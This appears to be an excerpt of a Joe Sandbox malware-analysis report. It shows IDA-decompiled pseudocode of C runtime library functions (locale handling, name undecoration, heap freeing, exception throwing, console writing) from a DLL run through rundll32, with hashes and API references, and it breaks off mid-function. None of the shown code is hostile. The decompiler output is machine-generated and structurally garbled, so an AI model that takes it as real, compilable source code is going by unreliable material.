				signed int _t167;
				signed int _t169;
				intOrPtr _t170;
				signed int _t173;
				signed int _t175;
				void* _t176;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				signed int _t220;
				intOrPtr* _t221;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t152 =  *0x1004d054; // 0x940b3682
				_v8 = _t152 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E10023FB6(__ecx, __edx) + 0x278;
				_t159 = E100250E8(__edx, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t159 == 0) {
					L39:
					_t160 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x2
					_t252 = _t10 << 4;
					_t162 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t162 !=  *_t220) {
							break;
						}
						if( *_t162 == 0) {
							L6:
							_t163 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t162 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t162 = _t162 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t163 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t164 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t164 - _v704;
							} while (_t164 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t167 = E10024214(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t167;
							__eflags = _t167;
							if(_t167 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_v728 = _t167 + 4;
								_t169 = E10028A30(_t167 + 4, _v708,  &_v272);
								_t264 = _t263 + 0xc;
								__eflags = _t169;
								if(_t169 != 0) {
									_t170 = _v728;
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									E1000E341();
									asm("int3");
									_push(_t260);
									_t173 = (_v772 & 0x0000ffff) - 0x2d;
									__eflags = _t173;
									if(_t173 == 0) {
										L51:
										__eflags = 0;
										return 0;
									} else {
										_t175 = _t173 - 1;
										__eflags = _t175;
										if(_t175 == 0) {
											_t176 = 2;
											return _t176;
										} else {
											__eflags = _t175 == 0x31;
											if(_t175 == 0x31) {
												goto L51;
											} else {
												__eflags = 1;
												return 1;
											}
										}
									}
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E10024D73(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E1002E537(_t244, __eflags, _v704, 1, 0x10044cf0, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E1003FDBF( &_v528,  *0x1004d0b4, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x10044d78; // 0x100245b6
									 *0x1004223c(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x1004d178;
										if(_t232 == 0x1004d178) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E100268B3( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E100268B3( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E100268B3( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t160 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E100268B3( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E100268B3(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t160 = _t244;
							L40:
							return E100037EA(_t160, _v8 ^ _t260, _t244);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t163 = _t162 | 0x00000001;
					__eflags = _t163;
					goto L8;
				}
				L52:
			}

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

_free.LIBCMT ref: 10025F4C
_free.LIBCMT ref: 10025F65
_free.LIBCMT ref: 10025FA3
_free.LIBCMT ref: 10025FAC
_free.LIBCMT ref: 10025FB8

Strings

C, xrefs: 10025DBD

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
Instruction ID: f4aafdac77f09b8263a2eb5dd3b4e6a66393a76b9c0d6fd7f3033f3f19c4753f
Opcode Fuzzy Hash: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
Instruction Fuzzy Hash: 43B17D7590121A9FDB64DF18D988AADB3F4FF08345F9145AAE80AA7350D731AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10008AEA, Relevance: 10.7, APIs: 7, Instructions: 151
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10008AEA(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x1004e004; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E1000770C(E10007684(E10007637(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E1000AAAD();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E10008798( &_v12, 0x5b);
						_t54 = E1000770C( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E10008D42(_a4, E100076C8(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x1004e004; // 0x0
								if( *_t73 != 0) {
									_t77 = E10007637(_t85,  &_v36, 0x5b, E10009E08(_t108,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E100076C8(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E100077A0( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = 0x10042dd4;
							_t85 =  &_v12;
							_v16 = 2;
							E10007748( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E100076C8(E10007637(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E100076A6(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E1000B1EA(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}

APIs

DName::operator+.LIBCMT ref: 10008B78
DName::operator+.LIBCMT ref: 10008BCB

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 10008BBC
DName::operator+.LIBCMT ref: 10008C1C
DName::operator+.LIBCMT ref: 10008C29
DName::operator+.LIBCMT ref: 10008C70
DName::operator+.LIBCMT ref: 10008C7D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction ID: 0dbcc1bb4ee46c20ec2d03185912c156ee3fc1c0119f9f9dc31a411e659c0aa6
Opcode Fuzzy Hash: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction Fuzzy Hash: 775186B5D04218AFEB05CB94C895EEEBBF8FF08390F044159F546A7185DB75AB44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10009E08, Relevance: 10.6, APIs: 7, Instructions: 102
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 42%

			E10009E08(void* __edx, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				void* __ebx;
				intOrPtr _t24;
				char* _t27;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr _t33;
				char _t38;
				intOrPtr* _t40;
				char _t42;
				char* _t45;
				char* _t46;
				void* _t55;
				intOrPtr* _t56;

				_t55 = __edx;
				_t40 =  *0x1004e004; // 0x0
				_t38 = 0;
				if( *_t40 == 0x51) {
					_t38 = 1;
					_t40 = _t40 + 1;
					 *0x1004e004 = _t40;
				}
				_t24 =  *_t40;
				if(_t24 != 0) {
					if(_t24 < 0x30 || _t24 > 0x39) {
						E1000CBF0(_t40,  &_v44);
						if(_v36 == 0) {
							_t27 =  *0x1004e004; // 0x0
							if( *_t27 != 0) {
								_t42 = 0;
								_v8 = 2;
								_v12 = 0;
								_t56 =  &_v12;
							} else {
								_t29 = E100072DE( &_v36, 1);
								goto L22;
							}
						} else {
							_push(_v40);
							 *0x1004e004 =  *0x1004e004 + 1;
							_push(_v44);
							if(_a8 == 0) {
								if(_t38 == 0) {
									_t45 =  &_v20;
									goto L11;
								} else {
									_t46 =  &_v36;
									goto L8;
								}
							} else {
								if(_t38 == 0) {
									_t29 = E10007328(_t38,  &_v20);
									goto L22;
								} else {
									_t30 = E10007328(_t38,  &_v36);
									goto L9;
								}
							}
							goto L23;
						}
					} else {
						_t33 = _t24;
						if(_t38 == 0) {
							asm("cdq");
							asm("adc edx, 0xffffffff");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t45 =  &_v36;
							_push(_t33 + 0xffffffd1);
							L11:
							_t29 = E100073B4(_t45);
							L22:
							_t56 = _t29;
						} else {
							asm("cdq");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t46 =  &_v20;
							_push(_t33 - 0x2f);
							L8:
							_t30 = E100073B4(_t46);
							L9:
							E100076A6(E1000723E( &_v28, 0x1004d070),  &_v12, _t30);
							_t56 =  &_v12;
						}
						L23:
						_t42 =  *_t56;
					}
					_t28 = _a4;
					 *_t28 = _t42;
					_t22 = _t56 + 4; // 0x40001004
					 *((intOrPtr*)(_t28 + 4)) =  *_t22;
				} else {
					E100072DE(_a4, 1);
					_t28 = _a4;
				}
				return _t28;
			}

APIs

DName::DName.LIBVCRUNTIME ref: 10009E30
DName::DName.LIBVCRUNTIME ref: 10009E5D

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 10009E78
DName::DName.LIBVCRUNTIME ref: 10009E95
DName::DName.LIBVCRUNTIME ref: 10009EC5
DName::DName.LIBVCRUNTIME ref: 10009ECF
DName::DName.LIBVCRUNTIME ref: 10009EF6

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction ID: 0ead771c213622766d894edfd69fa415a0cbe9b7da6d14d4204ba7d65ba76e3a
Opcode Fuzzy Hash: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction Fuzzy Hash: E731F471D042849AFF08CFA4CD91BED7BB5FF09380F104059E959A729ADB746D85CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000A460, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E1000A460(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				long _v76;
				char _v80;
				long long _v84;
				char _v92;
				char _v96;
				void* _v100;
				void* __ebp;
				signed int _t24;
				intOrPtr _t26;
				char* _t29;
				intOrPtr* _t30;
				intOrPtr* _t44;
				void* _t45;
				long long _t46;
				intOrPtr* _t55;
				signed int _t56;
				long long* _t57;
				long long _t61;

				_t54 = __edx;
				_t24 =  *0x1004d054; // 0x940b3682
				_v8 = _t24 ^ _t56;
				_t44 =  *0x1004e004; // 0x0
				_t55 = _a4;
				_t26 =  *_t44;
				if(_t26 != 0) {
					if(_t26 < 0x30 || _t26 > 0x39) {
						E1000CBF0(_t44,  &_v100);
						_pop(_t45);
						if(_v92 == 0) {
							L11:
							_t29 =  *0x1004e004; // 0x0
							if( *_t29 != 0) {
								_t46 = 0;
								_v80 = 2;
								_v84 = 0;
								_t30 =  &_v84;
							} else {
								_t30 = E100072DE( &_v84, 1);
								_t46 =  *_t30;
							}
							 *_t55 = _t46;
							 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							_v84 = _v100;
							_v80 = _v96;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L11;
								} else {
									_t61 = _v84;
									goto L8;
								}
							} else {
								_t61 = _v84;
								L8:
								 *_t57 = _t61;
								swprintf( &_v76, 0x41, "%lf", _t45, _t45);
								_v80 = 0;
								_push(_v80);
								E10006DC1(_t55,  &_v76);
							}
						}
					} else {
						asm("cdq");
						 *0x1004e004 = _t44 + 1;
						E100073B4(_t55, _t26 - 0x2f, __edx);
					}
				} else {
					E100072DE(_t55, 1);
				}
				return E100037EA(_t55, _v8 ^ _t56, _t54);
			}

APIs

DName::DName.LIBVCRUNTIME ref: 1000A484
DName::DName.LIBVCRUNTIME ref: 1000A4A8

Strings

A, xrefs: 1000A503
%lf, xrefs: 1000A4DC

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction ID: 1a9286bd75de71b3adf91c9212a77dd4288feb1749d5defe6a7f402daddab9a2
Opcode Fuzzy Hash: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction Fuzzy Hash: 7E31CEB5E042589BEF24CFA4DD45ADDBBB4FF0A380F10415EE8459B249C7B4A981CB05

Uniqueness

Uniqueness Score: -1.00%

Function 1002F7C8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002F7C8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E1002F497(_t45, 7);
					E1002F497(_t45 + 0x1c, 7);
					E1002F497(_t45 + 0x38, 0xc);
					E1002F497(_t45 + 0x68, 0xc);
					E1002F497(_t45 + 0x98, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0xa0)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa4)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa8)));
					E1002F497(_t45 + 0xb4, 7);
					E1002F497(_t45 + 0xd0, 7);
					E1002F497(_t45 + 0xec, 0xc);
					E1002F497(_t45 + 0x11c, 0xc);
					E1002F497(_t45 + 0x14c, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0x154)));
					E100268B3( *((intOrPtr*)(_t45 + 0x158)));
					E100268B3( *((intOrPtr*)(_t45 + 0x15c)));
					return E100268B3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 1002F497: _free.LIBCMT ref: 1002F4BC

_free.LIBCMT ref: 1002F816

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F821
_free.LIBCMT ref: 1002F82C
_free.LIBCMT ref: 1002F880
_free.LIBCMT ref: 1002F88B
_free.LIBCMT ref: 1002F896
_free.LIBCMT ref: 1002F8A1

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction ID: de5a865e1f82c24ee5e8fa7fff2b21cb884519308ee5bc5c1053497f94fa0323
Opcode Fuzzy Hash: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction Fuzzy Hash: F511DA75640B08AAE620EBF0ED47FEB7B9CEF04740F804D3DB699A6152DBA9B5048750

Uniqueness

Uniqueness Score: -1.00%

Function 1000337C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1000337C(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v52;
				char _v72;
				intOrPtr _v80;
				char _v104;
				intOrPtr _v112;
				char _v132;
				void* _t43;
				void* _t44;
				void* _t45;

				_t44 = _t43 - 0xc;
				E10002F08( &_v16, _a4);
				E10004C0B( &_v16, 0x1004ad80);
				asm("int3");
				_push(_t43);
				_t45 = _t44 - 0xc;
				E10002F7C( &_v44, _v24);
				E10004C0B( &_v44, 0x1004adbc);
				asm("int3");
				_push(_t44);
				E10002FB6( &_v72, _v52);
				E10004C0B( &_v72, 0x1004adf8);
				asm("int3");
				_push(_t45);
				E10002FF9( &_v104, _v80);
				E10004C0B( &_v104, 0x1004ae88);
				asm("int3");
				_push(_t45 - 0xc);
				E10003042( &_v132, _v112);
				E10004C0B( &_v132, 0x1004ae34);
				asm("int3");
				return "bad function call";
			}

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003388

Part of subcall function 10002F08: std::exception::exception.LIBCONCRT ref: 10002F15

Part of subcall function 10004C0B: RaiseException.KERNEL32(E06D7363,00000001,00000003,10003CFA,?,?,?,10003CFA,?,1004AC7C), ref: 10004C6B

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033A8

Part of subcall function 10002F7C: std::exception::exception.LIBCONCRT ref: 10002F89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033C8

Part of subcall function 10002FB6: std::exception::exception.LIBCONCRT ref: 10002FC3

std::regex_error::regex_error.LIBCPMT ref: 100033E8

Part of subcall function 10002FF9: std::exception::exception.LIBCONCRT ref: 10003011

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003408

Part of subcall function 10003042: std::exception::exception.LIBCONCRT ref: 1000304F

Strings

bad function call, xrefs: 1000341C

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: std::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID: bad function call
API String ID: 2470674941-3612616537
Opcode ID: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction ID: 9a04ec3b8265f418b22985a109fb5f94b6ecf92577c3c0eff2a7a32c9cb980e7
Opcode Fuzzy Hash: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction Fuzzy Hash: 3E11B77DC0410CBBEB04EAE4DC46CDD777DEF04180F904474BA2592456FB74BA5986D9

Uniqueness

Uniqueness Score: -1.00%

Function 1003265D, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E1003265D(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebp;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t241;
				signed int _t243;
				intOrPtr _t246;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				void* _t260;
				intOrPtr _t261;
				signed int _t262;
				signed char _t265;
				intOrPtr _t268;
				signed char* _t270;
				signed int _t273;
				signed int _t274;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				signed int _t281;
				struct _OVERLAPPED* _t283;
				struct _OVERLAPPED* _t285;
				signed int _t286;
				void* _t287;
				void* _t288;

				_t170 =  *0x1004d054; // 0x940b3682
				_v8 = _t170 ^ _t286;
				_t172 = _a8;
				_t265 = _t172 >> 6;
				_t243 = (_t172 & 0x0000003f) * 0x38;
				_t270 = _a12;
				_v108 = _t270;
				_v80 = _t265;
				_v112 =  *((intOrPtr*)(_t243 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x18));
				_v44 = _t243;
				_v96 = _a16 + _t270;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E1000F794( &_v72, _t265, 0);
				_t274 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t246 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t246;
				_v104 = _t270;
				if(_t270 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t249 = _v44;
						_v51 =  *_t270;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x1004e628 + _v80 * 4));
						_v48 = _t186;
						if(_t246 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t268 = _v48 + 0x2e + _t249;
						_v116 = _t268;
						while( *((intOrPtr*)(_t268 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t265 = _v96 - _t270;
						_v40 = _t211;
						if(_t211 <= 0) {
